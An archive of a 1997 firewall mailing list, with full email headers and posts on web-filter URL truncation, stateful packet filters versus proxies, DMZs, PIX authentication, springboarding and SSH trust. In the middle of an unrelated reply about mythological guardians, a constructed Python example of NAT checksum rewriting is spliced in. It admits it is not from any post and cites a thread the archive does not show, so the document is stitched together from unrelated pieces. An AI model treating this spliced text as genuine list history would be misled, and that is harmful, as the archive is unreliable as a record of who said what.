> >This is a list that Raptor licenses directly from Microsystems. The actual
> >URLs used, and their abbreviated nature, is due to how Microsystems chooses
> >to create their list. I am trying to open a formal path where our customers
> >can present queries/requests to them directly for particular sites. I will
> >keep you posted.
> >
> >-Allen
> >
> >At 09:29 AM 3/10/97 MST, 2LT Jeffery J. Lowder, 333-4615 wrote:
> >>Hello,
> >>
> >>We recently installed Raptor WebNOT to work with our Raptor Eagle 4.0
> >>firewall. Remember that WebNOT can be used to block access to
> >>'unauthorized' sites, where 'unauthorized' is defined as sites the company
> >>doesn't want its employees visiting.
> >>
> >>Apparently their database of 'bad' URLs contains many truncated URLs. If
> >>the URL is just an IP address, everything works great. However, if the
> >>URL is more than an IP address -- if the URL contains a directory path, a
> >>filename, or both -- we've found that the URL is normally truncated when
> >>listed in the WebNOT database.
> >>For example, the URL for DejaNews Research Service,
> >>
> >>http://199.86.32.6/members/stick/
> >>
> >>is stored in the WebNOT database (httprating.db) as
> >>
> >>http://199.86.32.6/mem
> >>
> >>Now, I don't claim to have detailed knowledge of the computer at
> >>199.86.32.6, but it stands to reason that there are probably multiple
> >>subdirectories under the /members directory. Yet Raptor WebNOT blocks
> >>access to ALL of these directories because apparently ONE of them contains
> >>nudity.
> >>
> >>You can imagine how much I enjoy taking heat from customers because we're
> >>blocking access to ostensibly legitimate sites.
> >>
> >>Am I not understanding something, or is this very poor design on Raptor's
> >>part? Is there anyone else out there who uses Raptor WebNOT and has
> >>experienced this problem?
> >>
> >>I tried calling Raptor directly to make a bug report, but since I don't
> >>have a maintenance contract with Raptor, the operator at Raptor customer
> >>support wouldn't even take my call.
> >>
> >>Lt Jeff Lowder
> >>Chief, Network Security
> >>United States Air Force Academy
> >>
> >>Disclaimer: The above content does not necessarily represent the views of
> >>the United States Government or the United States Air Force Academy.
> >
> >+-----------------------------------------------------------------------+
> >Allen Rogers | Raptor Systems Customer Support
> >arogers@raptor.com | http://www.raptor.com/cs/
> >(617)487-7700 x128 | (888)-RAPTOR1 (617) 890-6532 (FAX)
> >+-----------------------------------------------------------------------+
>
> +-----------------------------------------------------------------------+
> Allen Rogers | Raptor Systems Customer Support
> arogers@raptor.com | http://www.raptor.com/cs/
> (617)487-7700 x128 | (888)-RAPTOR1 (617) 890-6532 (FAX)
> +-----------------------------------------------------------------------+
>
> ++++++++
> +++++++++++
> This list is sponsored by: GE Capital IT Solutions Universal Data Consultants, Norcross, GA.
> To unsubscribe, send email to: raptor-list-request@udc.com with 'unsubscribe' as body of message.
> +++++++++++
> ++++++++
---------------End of Original Message-----------------

**************************************************************
/ Tomas L. Byrnes, Applications Engineer
/ American Digital Network, Network Integration Group
/ Date: 06/09/97 Time: 12:31:31
/ WANS/LANS, Connecting the World, Private/Public Networks,
/ ISPs, Data/LAN/Voice, Routing
**************************************************************

From owner-firewalls-outgoing Mon Jun 9 16:49:21 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA15258 for firewalls-outgoing; Mon, 9 Jun 1997 11:11:24 -0700 (PDT)
Received: from mail.clark.net (mail.clark.net [168.143.0.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA15220 for ; Mon, 9 Jun 1997 11:11:10 -0700 (PDT)
Received: from clark.net (proberts@explorer.clark.net [168.143.0.7]) by mail.clark.net (8.8.5/8.6.5) with ESMTP id OAA22048; Mon, 9 Jun 1997 14:11:12 -0400 (EDT)
Received: from localhost (proberts@localhost) by clark.net (8.8.5/8.7.1) with SMTP id OAA03080; Mon, 9 Jun 1997 14:11:40 -0400 (EDT)
X-Authentication-Warning: clark.net: proberts owned process doing -bs
Date: Mon, 9 Jun 1997 14:11:38 -0400 (EDT)
From: "Paul D. Robertson"
To: Ryan Russell/SYBASE
cc: firewalls
Subject: Re: Stateful Packet Filters vs. Proxies
In-Reply-To: <199706091631.JAA03973@notesgw2.sybase.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On 9 Jun 1997, Ryan Russell/SYBASE wrote:
> I'm not sure how one would measure reliability, but
> my personal experience has been good.
>
> I disagree that a SPF != a proxy, at least not
> entirely.

Well, the fact that the lower level protocols aren't protected behind the perimeter is an issue. With an application layer proxy, only the firewall needs to correctly handle sequence numbers, TCP window sizes, TCP headers, etc. With SPF, the SPF box implementations I've seen don't keep state on things like that for every connection, and if they do, normally out of order packet reception is severely degraded.
At some point, you lose the advantages over application layer gateways if you keep too much state information. Also, it's very difficult to code application layer blocking without a great deal more work; for instance, blocking as a tag is different than blocking as a string.

I've still yet to see an example of something a SPF blocks that an application layer gateway doesn't. The reverse certainly isn't true of current implementations.

Paul
-----------------------------------------------------------------------------
Paul D. Robertson "My statements in this message are personal opinions
proberts@clark.net which may have no basis whatsoever in fact."
PSB#9280

From owner-firewalls-outgoing Mon Jun 9 17:25:20 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA18179 for firewalls-outgoing; Mon, 9 Jun 1997 08:33:09 -0700 (PDT)
Received: from ranger.syntaxgroup.it (ranger.syntaxgroup.it [161.27.170.4]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id IAA18128 for ; Mon, 9 Jun 1997 08:32:50 -0700 (PDT)
Received: by ranger.syntaxgroup.it with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BC74FC.C615CF70@ranger.syntaxgroup.it>; Mon, 9 Jun 1997 17:44:26 +0200
Message-ID:
From: Costa Simona
To: "'Firewalls@GreatCircle.com'"
Subject: DMZ
Date: Mon, 9 Jun 1997 17:44:24 +0200
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi everybody!

I'm looking for some documentation concerning DMZ, just to explain to the boss what it is, how it is configured and so on. Can anyone help?

Thank you in advance.
Simona

From owner-firewalls-outgoing Mon Jun 9 18:35:30 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA23556 for firewalls-outgoing; Mon, 9 Jun 1997 09:05:15 -0700 (PDT)
Received: from zeke.gov.yk.ca (ZEKE.GOV.YK.CA [199.247.128.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id JAA23492 for ; Mon, 9 Jun 1997 09:04:59 -0700 (PDT)
Received: by zeke.gov.yk.ca; id JAA07504; Mon, 9 Jun 1997 09:11:35 -0700 (PDT)
Received: from unknown(199.247.130.39) by zeke.gov.yk.ca via smap (V3.1) id xma007487; Mon, 9 Jun 97 09:11:21 -0700
Received: from [199.247.134.75] ([199.247.134.75]) by tempest.gov.yk.ca (8.7.5/8.7.3) with SMTP id IAA15818; Mon, 9 Jun 1997 08:57:51 -0700
From: Larry Kwiat
To: proff@suburbia.net
cc: firewalls@greatcircle.com
Subject: Re: Cryptographic Mythology
Message-ID:
Date: Mon, 9 Jun 1997 09:19:23 -0400 (EDT)
X-Mailer: Simeon for Windows Version 4.0
X-Authentication: none
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wed, 4 Jun 1997 02:03:43 +1000 (EST) proff@suburbia.net wrote:
> Guards. Guardians. The Greeks didn't have many with bite and I'm.....
> losing patience with the whole culture.

...Have you considered Mahakala? - Tibetan Buddhist guardian of the Dharmas (natural laws, phil. incl. physics). It chains into the whole Hindu pantheon, but it makes an entertaining stop in Tibet in the 800's to engage the services of the local Bon religious security deities. They have interesting methods, having had their experiences with the Mongols etc. The chaotic aspect is particularly appealing.
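Geoff Mulligan's point earlier in this thread, that a NAT cannot stop at the IP header because the rewritten address is also covered by the TCP/UDP pseudo-header checksum, shown in code. This is an added example, not code from any post or product; the addresses, packet and the RFC 1624 incremental update are the author's own construction.

```python
import struct

# Constructed addresses: an inside host, the NAT's public address, a server.
INSIDE_HOST = bytes([10, 0, 0, 5])
NAT_PUBLIC = bytes([192, 0, 2, 1])
SERVER = bytes([198, 51, 100, 7])


def ones_sum(data: bytes) -> int:
    """Folded 16-bit one's-complement sum (odd trailing byte zero-padded)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum((data[i] << 8) | data[i + 1] for i in range(0, len(data), 2))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def checksum(data: bytes) -> int:
    return (~ones_sum(data)) & 0xFFFF


def build_packet(src: bytes, dst: bytes, sport: int, dport: int, payload: bytes) -> bytes:
    """Constructed IPv4+TCP packet with a correct header checksum and a correct
    TCP checksum over the pseudo-header (src, dst, zero, proto 6, TCP length)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1000, 0, 5 << 4, 0x18, 8192, 0, 0) + payload
    pseudo = src + dst + struct.pack("!BBH", 0, 6, len(tcp))
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0x1234, 0x4000, 64, 6, 0, src, dst)
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return ip + tcp


def ip_checksum_ok(pkt: bytes) -> bool:
    return ones_sum(pkt[:20]) == 0xFFFF


def tcp_checksum_ok(pkt: bytes) -> bool:
    """Verify the TCP checksum the way the receiver does: pseudo-header from
    the IP addresses actually on the wire plus the whole segment."""
    tcp = pkt[20:]
    pseudo = pkt[12:16] + pkt[16:20] + struct.pack("!BBH", 0, 6, len(tcp))
    return ones_sum(pseudo + tcp) == 0xFFFF


def nat_layer3_only(pkt: bytes, new_src: bytes) -> bytes:
    """The 'strictly layer 3' NAT from the thread: rewrite the IP source and
    recompute only the IP header checksum; the TCP segment is left untouched."""
    ip = pkt[:10] + b"\x00\x00" + new_src + pkt[16:20]
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return ip + pkt[20:]


def incremental_update(old_csum: int, old_bytes: bytes, new_bytes: bytes) -> int:
    """RFC 1624 equation 3: HC' = ~(~HC + ~m + m'), so the NAT can fix the TCP
    checksum from the address change alone, without touching the payload."""
    total = (~old_csum & 0xFFFF) + ones_sum(bytes(b ^ 0xFF for b in old_bytes)) + ones_sum(new_bytes)
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def nat_full(pkt: bytes, new_src: bytes) -> bytes:
    """Rewrite the IP source and fix both checksums: the address change
    cascades into the TCP pseudo-header, exactly as the thread says."""
    old_src = pkt[12:16]
    out = nat_layer3_only(pkt, new_src)
    tcp = out[20:]
    old_csum = struct.unpack("!H", tcp[16:18])[0]
    new_csum = incremental_update(old_csum, old_src, new_src)
    return out[:20] + tcp[:16] + struct.pack("!H", new_csum) + tcp[18:]


def demo() -> dict:
    """(ip_ok, tcp_ok) for the original packet and for both NAT variants."""
    pkt = build_packet(INSIDE_HOST, SERVER, 40000, 80, b"GET / HTTP/1.0\r\n\r\n")
    l3 = nat_layer3_only(pkt, NAT_PUBLIC)
    full = nat_full(pkt, NAT_PUBLIC)
    return {
        "original": (ip_checksum_ok(pkt), tcp_checksum_ok(pkt)),
        "layer3_only": (ip_checksum_ok(l3), tcp_checksum_ok(l3)),
        "full": (ip_checksum_ok(full), tcp_checksum_ok(full)),
    }


if __name__ == "__main__":
    for name, (ip_ok, tcp_ok) in demo().items():
        print(f"{name:12s} IP checksum ok={ip_ok}  TCP checksum ok={tcp_ok}")
```

The layer-3-only rewrite leaves a valid IP header and an invalid TCP checksum, which the server silently drops; the same applies to UDP and to the embedded FTP PORT address the thread also mentions.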
From owner-firewalls-outgoing Mon Jun 9 19:17:55 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA24199 for firewalls-outgoing; Mon, 9 Jun 1997 09:08:30 -0700 (PDT)
Received: from deere2-bh.dx.deere.com (deere2-bh.dx.deere.com [207.122.201.67]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id JAA24092 for ; Mon, 9 Jun 1997 09:08:08 -0700 (PDT)
Received: (from uucp@localhost) by deere2-bh.dx.deere.com (8.6.12/8.6.11) id LAA13718; Mon, 9 Jun 1997 11:06:21 -0500
Received: from 192.43.1.3 by deere2-bh.dx.deere.com via smap (3.2) id xma013707; Mon, 9 Jun 97 11:06:09 -0500
Received: from 90.deere.com by deere (SMI-8.6/SMI-SVR4) id LAA06180; Mon, 9 Jun 1997 11:06:42 -0500
Received: from catbert.uu.deere.com by 90.deere.com (SMI-8.6/SMI-SVR4) id LAA24963; Mon, 9 Jun 1997 11:06:40 -0500
Message-ID: <339C2A10.FDAC0C72@90.deere.com>
Date: Mon, 09 Jun 1997 11:06:40 -0500
From: Bertrum Carroll
Organization: Deere & Company
X-Mailer: Mozilla 4.0b5 [en] (Win95; I)
MIME-Version: 1.0
To: "Daniel G. Drumm"
CC: Hidayatullah Khan , "Firewalls@GreatCircle.COM"
Subject: Re: Restrict Springboarding
X-Priority: 3 (Normal)
References:
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I'm sure you're getting a lot of good ideas to help stop springboarding. Please consider the following.

1. Start with your lawyers. Have your business partners agree not to "springboard".
2. Put your anti-springboard measures in place and test them (wrappers or whatever you pick).
3. Turn on "auditing" on the target systems. Thus if someone attempts to springboard you will have a clue. But, you must check your logs!

....... Insert standard legal disclaimers ,,,,, Not the view of my firm .... so on and so on.....
From owner-firewalls-outgoing Mon Jun 9 19:48:07 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id PAA29299 for firewalls-outgoing; Mon, 9 Jun 1997 15:54:38 -0700 (PDT)
Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id PAA29270 for ; Mon, 9 Jun 1997 15:54:30 -0700 (PDT)
Received: from bizet.videotron.net (bizet.videotron.net [205.151.222.75]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with ESMTP id PAA22874 for ; Mon, 9 Jun 1997 15:57:22 -0700 (PDT)
Received: from vldejqqt (ppp087.216.msherb.videotron.net [207.96.216.87]) by bizet.videotron.net (8.8.5/8.8.2) with ESMTP id SAA03968 for ; Mon, 9 Jun 1997 18:55:01 -0400 (EDT)
Message-Id: <199706092255.SAA03968@bizet.videotron.net>
From: "Smoothy"
To:
Date: Mon, 9 Jun 1997 19:00:18 -0400
X-MSMail-Priority: Normal
X-Priority: 3
X-Mailer: Microsoft Internet Mail 4.70.1155
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

POSTS

Hello,

I'm presently looking to establish which confusions all the security mechanisms can involve in opposition with the ethics. If any ideas came to your mind... would u please send them to my email address: smoothy@videotron.ca.

Example: a lot of firewalls need to decrypt a mail to check for viruses in it, but that is directly in opposition to confidentiality.

Tx to all of u!

Stephane Routhier
Bombardier Inc.
Division Sea-Doo/Ski-doo

From owner-firewalls-outgoing Mon Jun 9 19:53:03 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id RAA15248 for firewalls-outgoing; Mon, 9 Jun 1997 17:09:44 -0700 (PDT)
Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id RAA15230 for ; Mon, 9 Jun 1997 17:09:35 -0700 (PDT)
Message-Id: <199706100009.RAA15230@honor.greatcircle.com>
Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA096841061; Tue, 10 Jun 1997 10:04:21 +1000
From: Darren Reed
Subject: Re: Stateful Packet Filters vs. Proxies
To: Ryan.Russell@sybase.com (Ryan Russell/SYBASE)
Date: Tue, 10 Jun 1997 10:04:21 +1000 (EST)
Cc: firewalls@GreatCircle.COM
In-Reply-To: <199706091645.JAA04938@notesgw2.sybase.com> from "Ryan Russell/SYBASE" at Jun 9, 97 09:51:38 am
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In some mail from Ryan Russell/SYBASE, sie said:
>
> The FTP port command thing was fixed, I don't know in what version.
>
> I don't know what you mean by not recreating the upper
> layers of data. The reason FTP requires special
> handling is because of the way FTP works, not TCP.
> All of TCP is not a special case, as FTP is. There
> are a whole bunch of applications that work as
> telnet-style TCP that one's SPF/proxy doesn't need to
> have a clue about unless you want to do some
> kind of filtering.

Humbug. That is the sort of reasoning which has led to these problems.

TCP is a data stream. What does that mean? It means data goes through it in a byte-by-byte fashion. If more than one byte is in a packet, well, that makes for better efficiency. What you're seeing when FW1 broke is the assumption that the entire "PORT" command was in one packet (the usual behaviour and optimization).
That it broke highlights the flaw - they're not treating TCP like TCP. Darren From owner-firewalls-outgoing Mon Jun 9 19:55:44 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id TAA13384 for firewalls-outgoing; Mon, 9 Jun 1997 19:31:40 -0700 (PDT) Received: from mnau.mn.br.np.els-gms.att.net (mnau.mn.br.np.els-gms.att.net [199.191.131.87]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id TAA13301 for ; Mon, 9 Jun 1997 19:31:24 -0700 (PDT) From: Brown_Michael_K@bns.attmail.com Date: Mon, 09 Jun 1997 22:31:43 -0400 Received: from bns by attmail; Tue Jun 10 02:32 GMT 1997 Received: from misfld01.bns.att.com (misfld01.bns.att.com [135.170.169.239]) by ptown1.bns.att.com (8.7.3/2.4) with ESMTP id TAA17638 for ; Mon, 9 Jun 1997 19:36:24 -0700 (PDT) Received: from localhost by misfld01.bns.att.com with SMTP (1.40.112.8/16.2) id AA208089914; Mon, 9 Jun 1997 22:31:54 -0400 Subject: Simple firewall? To: internet!GreatCircle.COM!firewalls@bns.attmail.com X-Openmail-Hops: 1 Message-Id: <01A1542B@MHS> X-OM2PMX: @(#) $2.0$ Mime-Version: 1.0 Content-Disposition: attachment; filename="text1.txt" Content-Type: Text/Plain; charset=us-ascii; name="text1.txt" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk If someone just wants to only allow email into their network, perform NAT(since they are not registered legal internal addresses) and allow internal users to surf the internet using http, what is the most economical and still secure way/product to do this? Thanks in advance. 
From owner-firewalls-outgoing Mon Jun 9 20:25:44 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id SAA27883 for firewalls-outgoing; Mon, 9 Jun 1997 18:10:37 -0700 (PDT) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id RAA20059 for ; Mon, 9 Jun 1997 17:32:15 -0700 (PDT) Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35]) by halon.sybase.com (8.8.4/8.8.4) with SMTP id RAA00549 for ; Mon, 9 Jun 1997 17:36:11 -0700 (PDT) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) id AA18585; Mon, 9 Jun 97 17:33:35 PDT Received: (from unixsvr1@localhost) by notesgw2.sybase.com (8.8.4/8.8.4) id RAA02591 for @sybgate.sybase.com:firewalls@GreatCircle.COM; Mon, 9 Jun 1997 17:31:48 -0700 (PDT) Message-Id: <199706100031.RAA02591@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id 14F78B884E810F2C882564B2000364E5; Mon, 9 Jun 97 17:31:23 EDT To: Donald Branch Cc: firewall , firewalls From: Ryan Russell/SYBASE Date: 9 Jun 97 17:38:06 EDT Subject: Re: DHCP and Firewall 1 X-Lotus-Type: Reply All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ok, much clearer. No, you're screwed. Seriously, FW1 doesn't allow for rules to kick in on the fly, and I don't believe you can write rules based on name or anything like that. Ryan ---------- Previous Message ---------- To: firewall cc: firewalls From: donaldb@ncmi-ny.com (Donald Branch) @ smtp Date: 06/09/97 04:44:44 PM Subject: DHCP and Firewall 1 Let me restate my previous DHCP and firewall 1 Question. I have a Windows NT machine running DHCP I want to be able from that one machine to be able to get out to AOL but since it's ip address keeps changing I can't make a rule based on his ip address. I do not want to open up the port that AOL uses to the world just one machine. 
Any one have any ideas would be appreciated. Donald Branch Unix Sys Admin From owner-firewalls-outgoing Mon Jun 9 20:31:09 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id TAA08658 for firewalls-outgoing; Mon, 9 Jun 1997 19:02:34 -0700 (PDT) Received: from cih-gw.cih.com (cih-gw.cih.com [204.69.206.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id TAA08623 for ; Mon, 9 Jun 1997 19:02:25 -0700 (PDT) Received: (from mail@localhost) by cih-gw.cih.com (8.7.6/8.6.9) id WAA24209; Mon, 9 Jun 1997 22:04:07 -0400 X-Authentication-Warning: cih-gw.cih.com: mail set sender to using -f Received: from cih-gw.cih.com(204.69.206.1) via SMTP by cih-gw.cih.com, id smtpd24205aaa; Tue Jun 10 02:03:59 1997 Date: Mon, 9 Jun 1997 22:03:59 -0400 (EDT) From: "Craig I. Hagan" Reply-To: hagan@cih.com To: Anton J Aylward cc: Bernd Eckenfels , firewalls@GreatCircle.COM Subject: Re: Plug-gw- One to many relationship In-Reply-To: <3.0.32.19970608233222.0096f100@the-wire.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > That's just my point. > Despite many people telling me the one-to-many has some magic > way of extracting the data lost in the many to one mapping. > > Yes, I've had people tell me no information is lost is the > mufti-hosts sharing one IP address. Just having NAT doesn't > work that magic. This is about incoming, not outgoing, plugs. > > Thanks, Brend, for restoring my confidence that someone > out there knows what I was talking about. > if anyone feels like coding, you can take the Host: parameter that most www browsers present. the syntax is/appears to be: GET Host: [many more arguments/capabilities] e.g. 
GET / HTTP/1.0 Host: foo.bar.com:3002 I don't think that it would be horribly difficult to code a proxy and/or hack http-gw (or something else) to read the first line, save it, grab the second line, shoot it at the desired host and/or port. the latter part should be simple for your usage as you have a different internal mapping of host/ip's than the external one, so the f/w can use the relevant internal ones for this usage. -- craig ------------------------------------------------------------------------------- Craig I. Hagan "It's a small world, but I wouldn't want to back it up" hagan@cih.com "True hackers don't die, their ttl expires" "It takes a village to raise an idiot, but an idiot can raze a village" From owner-firewalls-outgoing Mon Jun 9 20:36:41 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id QAA01099 for firewalls-outgoing; Mon, 9 Jun 1997 16:04:08 -0700 (PDT) Received: from inet03.citec.qld.gov.au (inet03.citec.qld.gov.au [203.5.10.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id QAA00872 for ; Mon, 9 Jun 1997 16:03:16 -0700 (PDT) Received: by inet03.citec.qld.gov.au; id JAA00101; Tue, 10 Jun 1997 09:03:58 +1000 Received: from guru.citec.qld.gov.au(147.132.20.47) by inet03.citec.qld.gov.au via smap (3.2) id xma000032; Tue, 10 Jun 97 09:03:44 +1000 Received: (from sgcccdc@localhost) by guru.citec.qld.gov.au (8.6.12/8.6.12) id JAA15912 for firewalls@greatcircle.com; Tue, 10 Jun 1997 09:06:34 +1000 From: Colin Campbell Message-Id: <199706092306.JAA15912@guru.citec.qld.gov.au> Subject: PIX http authentication question To: firewalls@greatcircle.com Date: Tue, 10 Jun 1997 09:06:33 +1000 (EST) X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, Would someone knowledgeable (or otherwise :-) care to enlighten me (and possibly others) on how the PIX authenticates users 
of the HTTP protocol. My understanding so far .... On receiving an HTTP packet from a host (not user) the PIX looks to see if one has already been received an the host (not user) has autheticated. If so and the configurable timeout has not expired, the packet flows. If not ... Send something back to the browser to indiacte that the user must supply some authetication. The browser then sends something back which the PIX interprets as authentication information, checks the database and allows or denies access to the IP address from which the packets came. It is this process in which I need more information. There seem to be several shortcomings on this sort of authentication based on IP. Consider sites using DHCP. It is possible that someone not allowed internet access (it happens) gets a free IP that is (by virtue of the fact the previous user authenticated). Same thing goes for dialup users getting a previously authenticated IP with time still left on the Pix meter. Consider multi-user hosts. Only the first person through the firewall needs to authenticate - everyone else travels on that same "ticket". This last point tends to indicate that the browser sends nothing to the PIX in the normal HTTP stream and that the authentication is done by a separate application (Java?) on the user's machine. This then brings problmes with people running Lynx (there are some still) or hosts not supported by PIX's "authentication client". Waiting for info ... 
Colin From owner-firewalls-outgoing Mon Jun 9 21:12:28 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA15216 for firewalls-outgoing; Mon, 9 Jun 1997 14:26:54 -0700 (PDT) Received: from mail.ruhrgebiet.individual.net (in-ruhr.ruhr.de [141.39.224.38]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id OAA15204 for ; Mon, 9 Jun 1997 14:26:43 -0700 (PDT) Received: (from admin@localhost) by mail.ruhrgebiet.individual.net (8.8.5/8.8.5) with UUCP id WAA20062 for firewalls@GreatCircle.COM; Mon, 9 Jun 1997 22:26:18 +0200 (MET DST) Received: from hostname.devnull.ruhr.de (benedikt@hostname.devnull.ruhr.de [192.168.122.11]) by devnull.local.net (8.6.12/8.6.9) with ESMTP id KAA01286 for ; Mon, 9 Jun 1997 10:31:27 +0200 Received: (from benedikt@localhost) by hostname.devnull.ruhr.de (8.7.5/8.7.3) id KAA00477; Mon, 9 Jun 1997 10:47:46 +0200 To: firewalls@GreatCircle.COM Subject: Re: ssh proxy for fwtk References: <199706060134.SAA01939@mail.marben.com> Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit From: Benedikt Stockebrand Date: 09 Jun 1997 10:47:45 +0200 In-Reply-To: girsch@marben.com's message of Thu, 5 Jun 1997 18:34:53 -0700 (PDT) Message-ID: <87raec9n7y.fsf@devnull.ruhr.de> Lines: 32 X-Mailer: Gnus v5.3/Emacs 19.34 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk girsch@marben.com (Arnaud Girsch) writes: > > I'm not sure, but what about this one: If the remote machine has been > > hacked, then X forwarding can be more of a problem than help. If the > > remote sshd (or /bin/*sh or whatever) has been modified to use that X > > forwarding they're just about right in your local machine. And you > > can't even tell because you'd need your local users private key to > > decrypt things to analyze them. > > In any case, SSH is based on a double trust of both hosts. If one of the hosts > is compromised, you might be exposed to brakeins. 
Not quite---primarily the host running the server is trusting the host running the client but not the other way round. If I ssh into a remote machine I only execute things on that remote machine, so in theory only the remote machine should be vulnerable to any attack, not the local one where the connection originated. If the local machine got hacked it can hose the remote one but not the other way. In practice the problem isn't limited to X11 forwarding but also to dangerous terminal capabilities like keyboard redefinition. But this seems less unexpected to me and is also limited to the window(s) I run the ssh client in. Ben -- Ben(edikt)? Stockebrand Runaway ping.de Admin---Never Ever Trust Old Friends My name and email address are not to be added to any list used for advertising purposes. Any sender of unsolicited advertisement e-mail to this address im- plicitly agrees to pay a DM 500 fee to the recipient for proofreading services. From owner-firewalls-outgoing Mon Jun 9 21:46:39 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id RAA22882 for firewalls-outgoing; Mon, 9 Jun 1997 17:45:20 -0700 (PDT) Received: from mail.clark.net (mail.clark.net [168.143.0.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id RAA22658 for ; Mon, 9 Jun 1997 17:44:39 -0700 (PDT) Received: from explorer2.clark.net (proberts@explorer2.clark.net [168.143.0.5]) by mail.clark.net (8.8.5/8.6.5) with ESMTP id UAA17829; Mon, 9 Jun 1997 20:44:53 -0400 (EDT) Received: from localhost (proberts@localhost) by explorer2.clark.net (8.8.5/8.7.1) with SMTP id UAA00350; Mon, 9 Jun 1997 20:45:25 -0400 (EDT) X-Authentication-Warning: explorer2.clark.net: proberts owned process doing -bs Date: Mon, 9 Jun 1997 20:45:25 -0400 (EDT) From: "Paul D. Robertson" Reply-To: "Paul D. Robertson" To: Ryan Russell/SYBASE cc: firewalls Subject: Re: Stateful Packet Filters vs. 
Proxies In-Reply-To: <199706092304.QAA28395@notesgw2.sybase.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On 9 Jun 1997, Ryan Russell/SYBASE wrote: > >This means that NT machines behind SPFs are vulnerable to "Son of OOB" > >type attacks, not so proxy protected machines behind a non-NT proxy. > > A proxy would have to written specifically to handle the OOB problem, > it would not be handled automatically. It would probably be easier Wrong, the protections of a "hardened host" for OOB problems are included because you aren't passing the problem to the other hosts. One machine, or several thousasand, I know which I find easier to keep updated and protected. > to modify the SPF to catch it, actually. Imagine if you were using the > host OS, and your proxy depended to some degree on the NetBIOS > over TCP implementation in NT - then your proxy would get nailed > by the OOB attack, and not the inside machine. 1. I said "non-NT" firewall, in which case I'm *not* nailed. 2. I said "Son of OOB", which is pertinent to *any* TCP connection with NT, _not_ just NetBIOS services. It's not a proxy issue because it's a lower level attack, 